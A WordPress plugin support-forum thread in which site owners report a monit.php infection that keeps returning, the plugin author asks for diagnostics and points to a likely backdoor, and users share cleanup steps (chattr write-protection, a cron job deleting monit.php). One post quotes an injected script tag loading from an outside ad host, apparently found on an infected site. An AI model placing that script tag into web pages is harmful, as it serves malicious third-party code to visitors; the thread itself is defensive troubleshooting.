monit.php coming back

  • Hello,

    i have just installed your plugin and it found monit.php and it cant removit.

    it removed some other files that seem to be connected with that malware.
    i have tried to clean again but no luck.
    The items highlighted in red have been found to be re-infected. The malicious code has returned and needs to be cleaned again. but still dont remove.

    any ideas?

    • This topic was modified 4 years, 5 months ago by birken.
Viewing 9 replies - 1 through 9 (of 9 total)
  • Plugin Author Eli

    (@scheeeli)

    There is one important distinction that needs to be made before we can know how to proceed. You have said “can’t remove” the infection ,and the infection “comes back” and we need to know which one it is.

    How long after the cleaning did you check the file?

    Can you verify if that file was clean right after the fix was applied?

    Can you verify if the fix failed to clean the file at all?

    If the answer to any of these is unclean then you can send me a screenshot of the scan results, the fix results, the quarantine, and the stat results on that file (specifically the Changed and Modified timestamps on that file). Then I can determine what is actually going on here.

    @scheeeli monit.php
    add this to my wp files.

    <script type=”text/javascript” src=”//inpagepush.com/400/3336702″ data-cfasync=”false” async=”async”></script>

    please add to you plug

    thanks

    Plugin Author Eli

    (@scheeeli)

    Is this script tag injected into your DB or added to a file on your server?

    Where did you find this script?

    I need the full context of this scrip inorder to write a definition for it. Can you please send me the infected file?

    Thread Starter birken

    (@birken)

    hello Eli,

    is the queation for me or dkcross?

    Plugin Author Eli

    (@scheeeli)

    Hi @birken,

    My latest question was for @dkcross but I never got a answer from you to my prior post. Did you get your original issue resolved or do you need more help too?

    I have found a solution for it, you require FTP/SSH access to your server.

    Step: 1. Follow the first 4 steps mentioned in this link: (Make sure to follow the first 4 steps correctly to disinfect your server & database of malicious code, do not delete any other files yet).

    Step 2. Navigate to /wp-content/plugins/ folder and locate the following two files in the folder

    a. monit.php
    b. admin_ips.txt

    Using a text editor remove all the contents of it and save it (Be sure to remove all the contents).

    Step 3. With SSH: enter the following commands to make monit.php and admin_ips.txt write protect which will prevent the malicious code from appearing again even after you delete the files and database entries.

    chattr +i monit.php

chattr +i admin_ips.txt

    With FTP client: Right click on monit.php, admin_ips.txt and uncheck all the ticks on Read, Write, Execute file permission section to make it write protect. This has worked well on many sites where i have been called to fix this issue.

    Plugin Author Eli

    (@scheeeli)

    Hi @kailashaddanki,
    While steps 1 and 2 are helpful when manually cleaning one specific type of threat that my plugin is already removing automatically for these users it does not address the issue of this topic (that this threat keeps coming back).

    In step three you have outlined one way to prevent specific files from being overwritten but it requires not only that the user be able to SSH into their server but also that they are a super-user on that server, which is rare. This solution does not address the real issue here which is that hackers are able to write to these file, and most probably any file on the site. The problem here suggests that there is a back-door or some other exploitable vulnerability on their site or server that is allowing an unauthorized user to write to their filesystem. Therefore, these sites will not be safe until the root cause of this infection is uncovered.

    While my plugin already has many variants of pattern of known threats that are commonly responsible for this hack, there are new threat and exploits discovered every day and I add them to my definition updates whenever they are uncovered.

    Neither of the people who have posted their issue in this thread have replied to my follow-up questions so I would like to assume that they have used my plugin with the latest definition updates to fix the root cause of this issue and do not need any further help. However, I look forward to working with anyone who is having trouble keeping their site clean to discover the root cause so that I can add it to my definitions. This will help all those who come across the same kind of persistent infection in the future.

    I had a lot of trouble with this as it kept coming back despite all the efforts and scans with several tools.
    I have created a cron job in cpanel as a workaround to detect and delete monit.php from all of your WP installations.

    Note: Obviously this is NOT a proactive solution, so using strict security measures is necessary on top of this.

    find . -type f -name “monit.php” -exec echo {} \; -exec stat {} \; -exec rm -f {} \; | mailx -E -s “monit.php threat deleted” YOUR_EMAIL_ADDRESS

    https://forraskod.blogspot.com/2020/08/monitphp-malware.html

    Following. This is a real problem to WordPress. I just recently cleaned my website, changed credentials, and manually and activated Wordfence Pro. The monit plugin came back.

Viewing 9 replies - 1 through 9 (of 9 total)
  • The topic ‘monit.php coming back’ is closed to new replies.

Tags